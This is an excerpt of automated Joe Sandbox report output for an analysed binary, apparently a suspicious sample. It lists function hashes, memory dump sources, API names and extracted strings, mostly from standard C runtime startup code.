                                      • Instruction ID: cc727b492c041beb5a92ad447fd2a0eb8db98e9993b8da34eebdf01610c1968c
                                      • Opcode Fuzzy Hash: 2a5dcecb1721a6c2a0bdcdca376210b99c52dd83875adeac6d3bd41af53d55e2
                                      • Instruction Fuzzy Hash: 56A00271154C08E0E70ADB02F8617E56330E39A389F404091E71D47071DB39C841C344
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AB60B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$.$2$2$3$3$EpS$P$S$c$d$d$e$e$e$e$e$e$k$l$l$l$l$l$l$n$o$p$r$r$r$s$s$s$t$u
                                      • API String ID: 2118945035-4201720986
                                      • Opcode ID: 021ec8aca0d749c274d7480b5682be404f749c653c6b4338c4e8b6d91ade5567
                                      • Instruction ID: 29f2e0270e7db93dc08e2375d5cb1e6f611586abf49fafa0af259c28d4224597
                                      • Opcode Fuzzy Hash: 021ec8aca0d749c274d7480b5682be404f749c653c6b4338c4e8b6d91ade5567
                                      • Instruction Fuzzy Hash: D6416D2050C7C0C9E3629778845979FFFE26BA3748F48489DA1C94A293CBFB85588777
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AddressHandleProc$CriticalModuleSection__scrt_fastfail$CloseCountCreateDeleteEventInitializeSpin__scrt_initialize_onexit_tables
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 3861935373-1714406822
                                      • Opcode ID: 23178e0efa6d8e425eb324706edc119e6ca7b7928795a1b163fb530ddc4d6ce4
                                      • Instruction ID: 0788782dd8a65418c3989520a7403c478861d70f7c8d39ef9c9ca7ea77e151ee
                                      • Opcode Fuzzy Hash: 23178e0efa6d8e425eb324706edc119e6ca7b7928795a1b163fb530ddc4d6ce4
                                      • Instruction Fuzzy Hash: CF412EB0201B4182FB1BDB26F8503D56361AB8E7D1F985125AB1E4B7B6DF3EC545C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                      • String ID:
                                      • API String ID: 1664584033-0
                                      • Opcode ID: 472436d1f049dd52d889ebb830c91296deb9e460af84f85dba26e50def9a7604
                                      • Instruction ID: 233db52ef5ef4436f2406ba2e64883877d3cbfed7755f5fbf8731bd3284d5728
                                      • Opcode Fuzzy Hash: 472436d1f049dd52d889ebb830c91296deb9e460af84f85dba26e50def9a7604
                                      • Instruction Fuzzy Hash: 2C316BF120464586FB67FB67F4613E92291AB8D7C4F444025BB4A0BAF7DE79C8048349
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: __scrt_fastfail$CloseCreateCriticalDeleteEventHandleSection__scrt_initialize_onexit_tables_onexit
                                      • String ID:
                                      • API String ID: 3164422487-0
                                      • Opcode ID: 83cd550192942f7becd0f849c71b4693efbe5731a5386cace0302889684c6273
                                      • Instruction ID: 2592f0b118721ef6636a6a489feb38ed522fdd02e52cc67dd3d5f5cb9945c00e
                                      • Opcode Fuzzy Hash: 83cd550192942f7becd0f849c71b4693efbe5731a5386cace0302889684c6273
                                      • Instruction Fuzzy Hash: EA017CB060260082FB5AEB72F4513E91250AF8E3C0F841429BB0E0B6F3CE3AD445C609
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 1872a58244535851d29ff8dd527ccca21a8c7e2e43d0e59298a4f4627e764fc2
                                      • Instruction ID: 718dad1abc3a16d5621db6fd105de10dce4bca97f4cd99b75eadd5381403e9fa
                                      • Opcode Fuzzy Hash: 1872a58244535851d29ff8dd527ccca21a8c7e2e43d0e59298a4f4627e764fc2
                                      • Instruction Fuzzy Hash: 21F04971711B8082EF5A8B12F4903E92360BBCCBD0F48501ABB4B4B675DE7CC599C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: e41b20cec72f5249f04b32754f850369c2c37b01f5cce8c2ea33383d58ca69fc
                                      • Instruction ID: 17dcab79655dc74da92e90312785fc0d5e90b3d65ddbad97e9544b5806760717
                                      • Opcode Fuzzy Hash: e41b20cec72f5249f04b32754f850369c2c37b01f5cce8c2ea33383d58ca69fc
                                      • Instruction Fuzzy Hash: EB818AB2B10A9099FB66DB67A8807ED67A0B34CBC8F444116FF0A677B5DB35C446C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      APIs
                                      • GetProcAddress.KERNEL32(?,?,FFFFFFFF,000000014000A57F,?,?,00000000,0000000140009FEB,?,?,?,000000014000854D), ref: 000000014000A3C6
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      APIs
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                      • String ID: csm
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F02
                                      • SetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F6A
                                      • SetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F80
                                      • abort.LIBCMT ref: 0000000140009F86
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 0000000140007FD5
                                      • TlsSetValue.KERNEL32(?,?,?,00000001400066D5,?,?,?,?,000000014000633C,?,?,?,?,0000000140004A2F), ref: 0000000140007FEC
                                      Strings
                                      Similarity
                                      • API ID: Valuetry_get_function
                                      • String ID: FlsSetValue